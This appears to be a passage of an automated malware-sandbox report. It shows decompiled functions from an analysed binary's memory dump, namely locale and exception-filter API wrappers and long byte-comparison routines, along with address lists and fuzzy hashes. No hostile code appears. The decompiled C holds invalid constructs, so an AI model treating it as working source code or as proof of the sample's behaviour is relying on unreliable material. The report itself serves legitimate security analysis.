				if(_t6 == 0) {
					 *0xa51da4 = _a4;
					_t8 = EnumSystemLocalesW(E00A39279, 1);
					 *0xa51da4 =  *0xa51da4 & 0x00000000;
					return _t8;
				} else {
					return  *_t6(_a4, _a8, _a12, 0);
				}
			}

0x00a39290
0x00a39295
0x00a3929b
0x00a392b6
0x00a392bb
0x00a392c1
0x00a392c9
0x00a3929d
0x00a392ab
0x00a392ab

APIs

EnumSystemLocalesW.KERNEL32(00A39279,00000001,?,00A3F1FC,00A3F29A,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00A392BB

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 8132c779feb69862582675bec72f8a0a93a191345c08cb34a8d83f3afc589e53
Instruction ID: 38b0c3f3708b7e0dfa81fc9c30032121e8b824d4215b972774afe56bd43b0382
Opcode Fuzzy Hash: 8132c779feb69862582675bec72f8a0a93a191345c08cb34a8d83f3afc589e53
Instruction Fuzzy Hash: EAE0B636550308FFDF52DFE4EC46BAB3BA5BB44752F084411F6085A160C7B2A9619B44

Uniqueness

Uniqueness Score: -1.00%

Function 00A39313, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,00A35F64,?,?,?,00000002), ref: 00A3933A

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 10e70653197469c48303913248601d9a245e3bfb5171929a0b49b28869a7e933
Instruction ID: ca9771dcf299abd04059ec43ac99344d06bf2c939e0524ec92610a79269816c8
Opcode Fuzzy Hash: 10e70653197469c48303913248601d9a245e3bfb5171929a0b49b28869a7e933
Instruction Fuzzy Hash: A2D06776040609BF9F01DFE0FC46CAB7B69FB88765F544445F91845120D6B3A5219B61

Uniqueness

Uniqueness Score: -1.00%

Function 00A348D3, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A348D3(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}

0x00a348e0

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,00A32B14,00A32AC9), ref: 00A348D9

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d6f4bc163b121186bb3bb74d00f5fef7937c2d22ce1c715497d656686724d00f
Instruction ID: ae1266c4f58ff0358eb8a700e8a73814357abe968a393b52f8c30cfffd236249
Opcode Fuzzy Hash: d6f4bc163b121186bb3bb74d00f5fef7937c2d22ce1c715497d656686724d00f
Instruction Fuzzy Hash: 32A0123400010CA78E001B85EC0848A7F1CD6461507004110F40C00021873354214580

Uniqueness

Uniqueness Score: -1.00%

Function 00A3CE5D, Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00A3CE5D(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}

0x00a3ce5d
0x00a3ce5d
0x00a3ce63
0x00a3ceea
0x00a3ceec
0x00a3ceee
0x00000000
0x00000000
0x00a3cef4
0x00a3cefa
0x00a3cf81
0x00a3cf83
0x00a3cf85
0x00000000
0x00000000
0x00a3cf8b
0x00a3cf91
0x00a3d018
0x00a3d01a
0x00a3d01c
0x00000000
0x00000000
0x00a3d022
0x00a3d028
0x00a3d0af
0x00a3d0b1
0x00a3d0b3
0x00000000
0x00000000
0x00a3d0b9
0x00a3d0bf
0x00a3d146
0x00a3d148
0x00a3d14a
0x00000000
0x00000000
0x00a3d156
0x00a3d1de
0x00a3d1e0
0x00a3d1e2
0x00000000
0x00000000
0x00a3d1e8
0x00a3d1ee
0x00a3d275
0x00a3d277
0x00a3d279
0x00a3d279
0x00000000
0x00a3d279
0x00a3d1fb
0x00a3d1fd
0x00a3d215
0x00a3d21d
0x00a3d21f
0x00a3d237
0x00a3d23f
0x00a3d241
0x00a3d259
0x00a3d261
0x00a3d263
0x00a3d26c
0x00a3d26c
0x00000000
0x00a3d263
0x00a3d24a
0x00a3d253
0x00000000
0x00000000
0x00000000
0x00a3d253
0x00a3d228
0x00a3d231
0x00000000
0x00000000
0x00000000
0x00a3d231
0x00a3d206
0x00a3d20f
0x00000000
0x00000000
0x00000000
0x00a3d20f
0x00a3d164
0x00a3d166
0x00a3d17e
0x00a3d186
0x00a3d188
0x00a3d1a0
0x00a3d1a8
0x00a3d1aa
0x00a3d1c2
0x00a3d1ca
0x00a3d1cc
0x00a3d1d5
0x00a3d1d5
0x00000000
0x00a3d1cc
0x00a3d1b3
0x00a3d1bc
0x00000000
0x00000000
0x00000000
0x00a3d1bc
0x00a3d191
0x00a3d19a
0x00000000
0x00000000
0x00000000
0x00a3d19a
0x00a3d16f
0x00a3d178
0x00000000
0x00000000
0x00000000
0x00a3d178
0x00a3d0cc
0x00a3d0ce
0x00a3d0e6
0x00a3d0ee
0x00a3d0f0
0x00a3d108
0x00a3d110
0x00a3d112
0x00a3d12a
0x00a3d132
0x00a3d134
0x00a3d13d
0x00a3d13d
0x00000000
0x00a3d134
0x00a3d11b
0x00a3d124
0x00000000
0x00000000
0x00000000
0x00a3d124
0x00a3d0f9
0x00a3d102
0x00000000
0x00000000
0x00000000
0x00a3d102
0x00a3d0d7
0x00a3d0e0
0x00000000
0x00000000
0x00000000
0x00a3d0e0
0x00a3d035
0x00a3d037
0x00a3d04f
0x00a3d057
0x00a3d059
0x00a3d071
0x00a3d079
0x00a3d07b
0x00a3d093
0x00a3d09b
0x00a3d09d
0x00a3d0a6
0x00a3d0a6
0x00000000
0x00a3d09d
0x00a3d084
0x00a3d08d
0x00000000
0x00000000
0x00000000
0x00a3d08d
0x00a3d062
0x00a3d06b
0x00000000
0x00000000
0x00000000
0x00a3d06b
0x00a3d040
0x00a3d049
0x00000000
0x00000000
0x00000000
0x00a3d049
0x00a3cf9e
0x00a3cfa0
0x00a3cfb8
0x00a3cfc0
0x00a3cfc2
0x00a3cfda
0x00a3cfe2
0x00a3cfe4
0x00a3cffc
0x00a3d004
0x00a3d006
0x00a3d00f
0x00a3d00f
0x00000000
0x00a3d006
0x00a3cfed
0x00a3cff6
0x00000000
0x00000000
0x00000000
0x00a3cff6
0x00a3cfcb
0x00a3cfd4
0x00000000
0x00000000
0x00000000
0x00a3cfd4
0x00a3cfa9
0x00a3cfb2
0x00000000
0x00000000
0x00000000
0x00a3cfb2
0x00a3cf07
0x00a3cf09
0x00a3cf21
0x00a3cf29
0x00a3cf2b
0x00a3cf43
0x00a3cf4b
0x00a3cf4d
0x00a3cf65
0x00a3cf6d
0x00a3cf6f
0x00a3cf78
0x00a3cf78
0x00000000
0x00a3cf6f
0x00a3cf56
0x00a3cf5f
0x00000000
0x00000000
0x00000000
0x00a3cf5f
0x00a3cf34
0x00a3cf3d
0x00000000
0x00000000
0x00000000
0x00a3cf3d
0x00a3cf12
0x00a3cf1b
0x00000000
0x00000000
0x00000000
0x00a3ce69
0x00a3ce69
0x00a3ce70
0x00a3ce72
0x00a3ce8a
0x00a3ce8a
0x00a3ce92
0x00a3ce94
0x00a3ceac
0x00a3ceac
0x00a3ceb4
0x00a3ceb6
0x00a3cece
0x00a3cece
0x00a3ced6
0x00a3ced8
0x00a3cee1
0x00a3cee1
0x00000000
0x00a3ced8
0x00a3cebc
0x00a3cebf
0x00a3cec8
0x00a3ca20
0x00a3ca20
0x00a3d811
0x00a3d811
0x00000000
0x00a3cec8
0x00a3ce9a
0x00a3ce9d
0x00a3cea6
0x00000000
0x00000000
0x00000000
0x00a3cea6
0x00a3ce78
0x00a3ce7b
0x00a3ce84
0x00000000
0x00000000
0x00000000
0x00a3ce84

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 88e52ccb334fc2170180dc0fdfe3572779fe1bdf279282683fac67e303e72dff
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: ABC174322151A34ADF2D873AA83413FFAA25A927B1B1A175DF4B3DB1D5FE20C524D710

Uniqueness

Uniqueness Score: -1.00%

Function 00A3D292, Relevance: .3, Instructions: 341
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00A3D292(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}

0x00a3d292
0x00a3d292
0x00a3d298
0x00a3d320
0x00a3d322
0x00a3d324
0x00000000
0x00000000
0x00a3d32a
0x00a3d330
0x00a3d3b7
0x00a3d3b9
0x00a3d3bb
0x00000000
0x00000000
0x00a3d3c1
0x00a3d3c7
0x00a3d44e
0x00a3d450
0x00a3d452
0x00000000
0x00000000
0x00a3d458
